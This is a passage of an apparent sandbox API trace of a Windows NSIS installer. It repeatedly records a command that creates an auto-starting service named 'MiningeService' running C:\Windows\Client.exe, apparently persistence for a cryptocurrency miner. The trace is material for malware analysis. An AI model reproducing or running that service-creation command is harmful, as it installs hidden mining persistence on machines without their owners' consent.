(lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0273.378] lstrcpynA (in: lpString1=0x42a048, lpString2="Skipped: ", iMaxLength=1024 | out: lpString1="Skipped: ") returned="Skipped: " [0273.378] lstrlenA (lpString="Skipped: ") returned 9 [0273.379] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 59 [0273.379] lstrcatA (in: lpString1="Skipped: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" | out: lpString1="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0273.379] MulDiv (nNumber=42, nNumerator=30000, nDenominator=60) returned 21000 [0273.379] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5208, lParam=0x0) returned 0x5014 [0273.379] MulDiv (nNumber=43, nNumerator=30000, nDenominator=60) returned 21500 [0273.379] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x53fc, lParam=0x0) returned 0x5208 [0273.379] GetVersion () returned 0x1db10106 [0273.379] GetSystemDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0273.380] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0273.380] lstrcpynA (in: lpString1=0x42e3e1, lpString2="C:\\Windows\\", iMaxLength=1024 | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0273.380] lstrlenA (lpString="C:\\Windows") returned 10 [0273.380] lstrcpynA (in: lpString1=0x42e3ec, lpString2="Client.exe", iMaxLength=1024 | out: lpString1="Client.exe") returned="Client.exe" [0273.380] lstrlenA (lpString="Client.exe") returned 10 [0273.380] lstrcpynA (in: lpString1=0x2ae004, lpString2="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", iMaxLength=1024 | out: lpString1="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService" [0273.380] MulDiv (nNumber=44, nNumerator=30000, nDenominator=60) returned 22000 [0273.380] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x55f0, lParam=0x0) returned 0x53fc [0273.381] lstrcpynA (in: lpString1=0x2ae414, lpString2="/OEM", iMaxLength=1024 | out: lpString1="/OEM") returned="/OEM" [0273.381] MulDiv (nNumber=45, nNumerator=30000, nDenominator=60) returned 22500 [0273.381] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x57e4, lParam=0x0) returned 0x55f0 [0273.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0273.381] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0273.381] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0273.382] lstrcpynA (in: lpString1=0x40a410, lpString2="ExecToLog", iMaxLength=1024 | out: lpString1="ExecToLog") returned="ExecToLog" [0273.382] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 0x0 [0273.386] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x2d70000 [0273.388] GetProcAddress (hModule=0x2d70000, lpProcName="ExecToLog") returned 0x2d7102d [0273.388] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0273.388] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0273.389] GetCurrentProcess () returned 0xffffffff [0273.389] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d6fb40 | out: Wow64Process=0x2d6fb40*=1) returned 1 [0273.389] FindWindowExA (hWndParent=0x401e4, hWndChildAfter=0x0, lpszClass="#32770", lpszWindow=0x0) returned 0x40300 [0273.389] FindWindowExA (hWndParent=0x40300, hWndChildAfter=0x0, lpszClass="SysListView32", lpszWindow=0x0) returned 0x302f8 [0273.389] lstrcpyA (in: lpString1=0x2ae820, lpString2="/OEM" | out: lpString1="/OEM") returned="/OEM" [0273.389] lstrlenA (lpString="/TIMEOUT=") returned 9 [0273.389] lstrlenA (lpString="/OEM") returned 4 [0273.389] lstrcmpiA (lpString1="/OEM", lpString2="/OEM") returned 0 [0273.389] lstrcpyA (in: lpString1=0x2ae820, lpString2="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService" | out: lpString1="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService" [0273.390] lstrlenA (lpString="/TIMEOUT=") returned 9 [0273.390] lstrlenA (lpString="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 126 [0273.390] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0273.390] lstrlenA (lpString=":\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 125 [0273.390] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0273.391] lstrlenA (lpString="\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 124 [0273.391] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0273.391] lstrlenA (lpString="Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 123 [0273.391] lstrcmpiA (lpString1="Windows\\s", lpString2="/TIMEOUT=") returned 1 [0273.391] lstrlenA (lpString="indows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 122 [0273.391] lstrcmpiA (lpString1="indows\\sy", lpString2="/TIMEOUT=") returned 1 [0273.392] lstrlenA (lpString="ndows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 121 [0273.392] lstrcmpiA (lpString1="ndows\\sys", lpString2="/TIMEOUT=") returned 1 [0273.392] lstrlenA (lpString="dows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 120 [0273.392] lstrcmpiA (lpString1="dows\\syst", lpString2="/TIMEOUT=") returned 1 [0273.392] lstrlenA (lpString="ows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 119 [0273.392] lstrcmpiA (lpString1="ows\\syste", lpString2="/TIMEOUT=") returned 1 [0273.392] lstrlenA (lpString="ws\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 118 [0273.395] lstrcmpiA (lpString1="ws\\system", lpString2="/TIMEOUT=") returned 1 [0273.395] lstrlenA (lpString="s\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 117 [0273.395] lstrcmpiA (lpString1="s\\system3", lpString2="/TIMEOUT=") returned 1 [0273.396] lstrlenA (lpString="\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 116 [0273.396] lstrcmpiA (lpString1="\\system32", lpString2="/TIMEOUT=") returned 1 [0273.396] lstrlenA (lpString="system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 115 [0273.396] lstrcmpiA (lpString1="system32\\", lpString2="/TIMEOUT=") returned 1 [0273.396] lstrlenA (lpString="ystem32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 114 [0273.396] lstrcmpiA (lpString1="ystem32\\c", lpString2="/TIMEOUT=") returned 1 [0273.397] lstrlenA (lpString="stem32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 113 [0273.397] lstrcmpiA (lpString1="stem32\\cm", lpString2="/TIMEOUT=") returned 1 [0273.397] lstrlenA (lpString="tem32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 112 [0273.397] lstrcmpiA (lpString1="tem32\\cmd", lpString2="/TIMEOUT=") returned 1 [0273.397] lstrlenA (lpString="em32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 111 [0273.398] lstrcmpiA (lpString1="em32\\cmd.", lpString2="/TIMEOUT=") returned 1 [0273.398] lstrlenA (lpString="m32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 110 [0273.398] lstrcmpiA (lpString1="m32\\cmd.e", lpString2="/TIMEOUT=") returned 1 [0273.398] lstrlenA (lpString="32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 109 [0273.398] lstrcmpiA (lpString1="32\\cmd.ex", lpString2="/TIMEOUT=") returned 1 [0273.398] lstrlenA (lpString="2\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 108 [0273.398] lstrcmpiA (lpString1="2\\cmd.exe", lpString2="/TIMEOUT=") returned 1 [0273.399] lstrlenA (lpString="\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 107 [0273.399] lstrcmpiA (lpString1="\\cmd.exe ", lpString2="/TIMEOUT=") returned 1 [0273.399] lstrlenA (lpString="cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 106 [0273.399] lstrcmpiA (lpString1="cmd.exe /", lpString2="/TIMEOUT=") returned 1 [0273.399] lstrlenA (lpString="md.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 105 [0273.399] lstrcmpiA (lpString1="md.exe /C", lpString2="/TIMEOUT=") returned 1 [0273.399] lstrlenA (lpString="d.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 104 [0273.400] lstrcmpiA (lpString1="d.exe /C ", lpString2="/TIMEOUT=") returned 1 [0273.400] lstrlenA (lpString=".exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 103 [0273.400] lstrcmpiA (lpString1=".exe /C S", lpString2="/TIMEOUT=") returned -1 [0273.400] lstrlenA (lpString="exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 102 [0273.400] lstrcmpiA (lpString1="exe /C Sc", lpString2="/TIMEOUT=") returned 1 [0273.400] lstrlenA (lpString="xe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 101 [0273.400] lstrcmpiA (lpString1="xe /C Sc ", lpString2="/TIMEOUT=") returned 1 [0273.401] lstrlenA (lpString="e /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 100 [0273.401] lstrcmpiA (lpString1="e /C Sc c", lpString2="/TIMEOUT=") returned 1 [0273.401] lstrlenA (lpString=" /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 99 [0273.401] lstrcmpiA (lpString1=" /C Sc cr", lpString2="/TIMEOUT=") returned -1 [0273.401] lstrlenA (lpString="/C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 98 [0273.401] lstrcmpiA (lpString1="/C Sc cre", lpString2="/TIMEOUT=") returned -1 [0273.401] lstrlenA (lpString="C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 97 [0273.402] lstrcmpiA (lpString1="C Sc crea", lpString2="/TIMEOUT=") returned 1 [0273.402] lstrlenA (lpString=" Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 96 [0273.402] lstrcmpiA (lpString1=" Sc creat", lpString2="/TIMEOUT=") returned -1 [0273.402] lstrlenA (lpString="Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 95 [0273.402] lstrcmpiA (lpString1="Sc create", lpString2="/TIMEOUT=") returned 1 [0273.402] lstrlenA (lpString="c create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 94 [0273.402] lstrcmpiA (lpString1="c create ", lpString2="/TIMEOUT=") returned 1 [0273.403] lstrlenA (lpString=" create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 93 [0273.403] lstrcmpiA (lpString1=" create M", lpString2="/TIMEOUT=") returned -1 [0273.403] lstrlenA (lpString="create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 92 [0273.403] lstrcmpiA (lpString1="create Mi", lpString2="/TIMEOUT=") returned 1 [0273.403] lstrlenA (lpString="reate MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 91 [0273.403] lstrcmpiA (lpString1="reate Min", lpString2="/TIMEOUT=") returned 1 [0273.403] lstrlenA (lpString="eate MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 90 [0273.404] lstrcmpiA (lpString1="eate Mini", lpString2="/TIMEOUT=") returned 1 [0273.404] lstrlenA (lpString="ate MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 89 [0273.404] lstrcmpiA (lpString1="ate Minin", lpString2="/TIMEOUT=") returned 1 [0273.404] lstrlenA (lpString="te MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 88 [0273.404] lstrcmpiA (lpString1="te Mining", lpString2="/TIMEOUT=") returned 1 [0273.404] lstrlenA (lpString="e MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 87 [0273.404] lstrcmpiA (lpString1="e Mininge", lpString2="/TIMEOUT=") returned 1 [0273.405] lstrlenA (lpString=" MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 86 [0273.405] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0273.405] lstrlenA (lpString="MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 85 [0273.405] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0273.405] lstrlenA (lpString="iningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 84 [0273.405] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0273.405] lstrlenA (lpString="ningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 83 [0273.405] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0273.406] lstrlenA (lpString="ingeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 82 [0273.406] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0273.406] lstrlenA (lpString="ngeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 81 [0273.406] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0273.406] lstrlenA (lpString="geService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 80 [0273.406] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0273.407] lstrlenA (lpString="eService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 79 [0273.407] lstrcmpiA (lpString1="eService ", lpString2="/TIMEOUT=") returned 1 [0273.407] lstrlenA (lpString="Service binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 78 [0273.407] lstrcmpiA (lpString1="Service b", lpString2="/TIMEOUT=") returned 1 [0273.407] lstrlenA (lpString="ervice binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 77 [0273.407] lstrcmpiA (lpString1="ervice bi", lpString2="/TIMEOUT=") returned 1 [0273.407] lstrlenA (lpString="rvice binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 76 [0273.407] lstrcmpiA (lpString1="rvice bin", lpString2="/TIMEOUT=") returned 1 [0273.408] lstrlenA (lpString="vice binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 75 [0273.408] lstrcmpiA (lpString1="vice binp", lpString2="/TIMEOUT=") returned 1 [0273.408] lstrlenA (lpString="ice binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 74 [0273.408] lstrcmpiA (lpString1="ice binpa", lpString2="/TIMEOUT=") returned 1 [0273.408] lstrlenA (lpString="ce binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 73 [0273.408] lstrcmpiA (lpString1="ce binpat", lpString2="/TIMEOUT=") returned 1 [0273.409] lstrlenA (lpString="e binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 72 [0273.409] lstrcmpiA (lpString1="e binpath", lpString2="/TIMEOUT=") returned 1 [0273.409] lstrlenA (lpString=" binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 71 [0273.409] lstrcmpiA (lpString1=" binpath=", lpString2="/TIMEOUT=") returned -1 [0273.409] lstrlenA (lpString="binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 70 [0273.409] lstrcmpiA (lpString1="binpath= ", lpString2="/TIMEOUT=") returned 1 [0273.409] lstrlenA (lpString="inpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 69 [0273.409] lstrcmpiA (lpString1="inpath= C", lpString2="/TIMEOUT=") returned 1 [0273.410] lstrlenA (lpString="npath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 68 [0273.410] lstrcmpiA (lpString1="npath= C:", lpString2="/TIMEOUT=") returned 1 [0273.410] lstrlenA (lpString="path= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 67 [0273.410] lstrcmpiA (lpString1="path= C:\\", lpString2="/TIMEOUT=") returned 1 [0273.410] lstrlenA (lpString="ath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 66 [0273.410] lstrcmpiA (lpString1="ath= C:\\W", lpString2="/TIMEOUT=") returned 1 [0273.411] lstrlenA (lpString="th= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 65 [0273.411] lstrcmpiA (lpString1="th= C:\\Wi", lpString2="/TIMEOUT=") returned 1 [0273.411] lstrlenA (lpString="h= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 64 [0273.411] lstrcmpiA (lpString1="h= C:\\Win", lpString2="/TIMEOUT=") returned 1 [0273.411] lstrlenA (lpString="= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 63 [0273.411] lstrcmpiA (lpString1="= C:\\Wind", lpString2="/TIMEOUT=") returned 1 [0273.411] lstrlenA (lpString=" C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 62 [0273.411] lstrcmpiA (lpString1=" C:\\Windo", lpString2="/TIMEOUT=") returned -1 [0273.412] lstrlenA (lpString="C:\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 61 [0273.412] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0273.412] lstrlenA (lpString=":\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 60 [0273.412] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0273.412] lstrlenA (lpString="\\Windows\\Client.exe start= auto DisplayName= MiningeService") returned 59 [0273.412] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0273.413] lstrlenA (lpString="Windows\\Client.exe start= auto DisplayName= MiningeService") returned 58 [0273.413] lstrcmpiA (lpString1="Windows\\C", lpString2="/TIMEOUT=") returned 1 [0273.413] lstrlenA (lpString="indows\\Client.exe start= auto DisplayName= MiningeService") returned 57 [0273.413] lstrcmpiA (lpString1="indows\\Cl", lpString2="/TIMEOUT=") returned 1 [0273.413] lstrlenA (lpString="ndows\\Client.exe start= auto DisplayName= MiningeService") returned 56 [0273.413] lstrcmpiA (lpString1="ndows\\Cli", lpString2="/TIMEOUT=") returned 1 [0273.413] lstrlenA (lpString="dows\\Client.exe start= auto DisplayName= MiningeService") returned 55 [0273.413] lstrcmpiA (lpString1="dows\\Clie", lpString2="/TIMEOUT=") returned 1 [0273.414] lstrlenA (lpString="ows\\Client.exe start= auto DisplayName= MiningeService") returned 54 [0273.414] lstrcmpiA (lpString1="ows\\Clien", lpString2="/TIMEOUT=") returned 1 [0273.414] lstrlenA (lpString="ws\\Client.exe start= auto DisplayName= MiningeService") returned 53 [0273.414] lstrcmpiA (lpString1="ws\\Client", lpString2="/TIMEOUT=") returned 1 [0273.414] lstrlenA (lpString="s\\Client.exe start= auto DisplayName= MiningeService") returned 52 [0273.414] lstrcmpiA (lpString1="s\\Client.", lpString2="/TIMEOUT=") returned 1 [0273.414] lstrlenA (lpString="\\Client.exe start= auto DisplayName= MiningeService") returned 51 [0273.415] lstrcmpiA (lpString1="\\Client.e", lpString2="/TIMEOUT=") returned 1 [0273.415] lstrlenA (lpString="Client.exe start= auto DisplayName= MiningeService") returned 50 [0273.415] lstrcmpiA (lpString1="Client.ex", lpString2="/TIMEOUT=") returned 1 [0273.415] lstrlenA (lpString="lient.exe start= auto DisplayName= MiningeService") returned 49 [0273.415] lstrcmpiA (lpString1="lient.exe", lpString2="/TIMEOUT=") returned 1 [0273.415] lstrlenA (lpString="ient.exe start= auto DisplayName= MiningeService") returned 48 [0273.415] lstrcmpiA (lpString1="ient.exe ", lpString2="/TIMEOUT=") returned 1 [0273.416] lstrlenA (lpString="ent.exe start= auto DisplayName= MiningeService") returned 47 [0273.416] lstrcmpiA (lpString1="ent.exe s", lpString2="/TIMEOUT=") returned 1 [0273.416] lstrlenA (lpString="nt.exe start= auto DisplayName= MiningeService") returned 46 [0273.416] lstrcmpiA (lpString1="nt.exe st", lpString2="/TIMEOUT=") returned 1 [0273.416] lstrlenA (lpString="t.exe start= auto DisplayName= MiningeService") returned 45 [0273.416] lstrcmpiA (lpString1="t.exe sta", lpString2="/TIMEOUT=") returned 1 [0273.416] lstrlenA (lpString=".exe start= auto DisplayName= MiningeService") returned 44 [0273.417] lstrcmpiA (lpString1=".exe star", lpString2="/TIMEOUT=") returned -1 [0273.417] lstrlenA (lpString="exe start= auto DisplayName= MiningeService") returned 43 [0273.417] lstrcmpiA (lpString1="exe start", lpString2="/TIMEOUT=") returned 1 [0273.417] lstrlenA (lpString="xe start= auto DisplayName= MiningeService") returned 42 [0273.417] lstrcmpiA (lpString1="xe start=", lpString2="/TIMEOUT=") returned 1 [0273.417] lstrlenA (lpString="e start= auto DisplayName= MiningeService") returned 41 [0273.417] lstrcmpiA (lpString1="e start= ", lpString2="/TIMEOUT=") returned 1 [0273.418] lstrlenA (lpString=" start= auto DisplayName= MiningeService") returned 40 [0273.418] lstrcmpiA (lpString1=" start= a", lpString2="/TIMEOUT=") returned -1 [0273.418] lstrlenA (lpString="start= auto DisplayName= MiningeService") returned 39 [0273.418] lstrcmpiA (lpString1="start= au", lpString2="/TIMEOUT=") returned 1 [0273.418] lstrlenA (lpString="tart= auto DisplayName= MiningeService") returned 38 [0273.418] lstrcmpiA (lpString1="tart= aut", lpString2="/TIMEOUT=") returned 1 [0273.418] lstrlenA (lpString="art= auto DisplayName= MiningeService") returned 37 [0273.418] lstrcmpiA (lpString1="art= auto", lpString2="/TIMEOUT=") returned 1 [0273.419] lstrlenA (lpString="rt= auto DisplayName= MiningeService") returned 36 [0273.419] lstrcmpiA (lpString1="rt= auto ", lpString2="/TIMEOUT=") returned 1 [0273.419] lstrlenA (lpString="t= auto DisplayName= MiningeService") returned 35 [0273.419] lstrcmpiA (lpString1="t= auto D", lpString2="/TIMEOUT=") returned 1 [0273.419] lstrlenA (lpString="= auto DisplayName= MiningeService") returned 34 [0273.419] lstrcmpiA (lpString1="= auto Di", lpString2="/TIMEOUT=") returned 1 [0273.420] lstrlenA (lpString=" auto DisplayName= MiningeService") returned 33 [0273.420] lstrcmpiA (lpString1=" auto Dis", lpString2="/TIMEOUT=") returned -1 [0273.420] lstrlenA (lpString="auto DisplayName= MiningeService") returned 32 [0273.420] lstrcmpiA (lpString1="auto Disp", lpString2="/TIMEOUT=") returned 1 [0273.420] lstrlenA (lpString="uto DisplayName= MiningeService") returned 31 [0273.420] lstrcmpiA (lpString1="uto Displ", lpString2="/TIMEOUT=") returned 1 [0273.420] lstrlenA (lpString="to DisplayName= MiningeService") returned 30 [0273.420] lstrcmpiA (lpString1="to Displa", lpString2="/TIMEOUT=") returned 1 [0273.421] lstrlenA (lpString="o DisplayName= MiningeService") returned 29 [0273.421] lstrcmpiA (lpString1="o Display", lpString2="/TIMEOUT=") returned 1 [0273.421] lstrlenA (lpString=" DisplayName= MiningeService") returned 28 [0273.421] lstrcmpiA (lpString1=" DisplayN", lpString2="/TIMEOUT=") returned -1 [0273.421] lstrlenA (lpString="DisplayName= MiningeService") returned 27 [0273.421] lstrcmpiA (lpString1="DisplayNa", lpString2="/TIMEOUT=") returned 1 [0273.421] lstrlenA (lpString="isplayName= MiningeService") returned 26 [0273.422] lstrcmpiA (lpString1="isplayNam", lpString2="/TIMEOUT=") returned 1 [0273.422] lstrlenA (lpString="splayName= MiningeService") returned 25 [0273.422] lstrcmpiA (lpString1="splayName", lpString2="/TIMEOUT=") returned 1 [0273.422] lstrlenA (lpString="playName= MiningeService") returned 24 [0273.422] lstrcmpiA (lpString1="playName=", lpString2="/TIMEOUT=") returned 1 [0273.422] lstrlenA (lpString="layName= MiningeService") returned 23 [0273.422] lstrcmpiA (lpString1="layName= ", lpString2="/TIMEOUT=") returned 1 [0273.423] lstrlenA (lpString="ayName= MiningeService") returned 22 [0273.423] lstrcmpiA (lpString1="ayName= M", lpString2="/TIMEOUT=") returned 1 [0273.423] lstrlenA (lpString="yName= MiningeService") returned 21 [0273.423] lstrcmpiA (lpString1="yName= Mi", lpString2="/TIMEOUT=") returned 1 [0273.423] lstrlenA (lpString="Name= MiningeService") returned 20 [0273.423] lstrcmpiA (lpString1="Name= Min", lpString2="/TIMEOUT=") returned 1 [0273.423] lstrlenA (lpString="ame= MiningeService") returned 19 [0273.424] lstrcmpiA (lpString1="ame= Mini", lpString2="/TIMEOUT=") returned 1 [0273.424] lstrlenA (lpString="me= MiningeService") returned 18 [0273.424] lstrcmpiA (lpString1="me= Minin", lpString2="/TIMEOUT=") returned 1 [0273.424] lstrlenA (lpString="e= MiningeService") returned 17 [0273.424] lstrcmpiA (lpString1="e= Mining", lpString2="/TIMEOUT=") returned 1 [0273.424] lstrlenA (lpString="= MiningeService") returned 16 [0273.424] lstrcmpiA (lpString1="= Mininge", lpString2="/TIMEOUT=") returned 1 [0273.425] lstrlenA (lpString=" MiningeService") returned 15 [0273.425] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0273.425] lstrlenA (lpString="MiningeService") returned 14 [0273.425] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0273.425] lstrlenA (lpString="iningeService") returned 13 [0273.425] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0273.425] lstrlenA (lpString="ningeService") returned 12 [0273.425] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0273.426] lstrlenA (lpString="ingeService") returned 11 [0273.426] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0273.426] lstrlenA (lpString="ngeService") returned 10 [0273.426] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0273.426] lstrlenA (lpString="geService") returned 9 [0273.426] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0273.427] lstrlenA 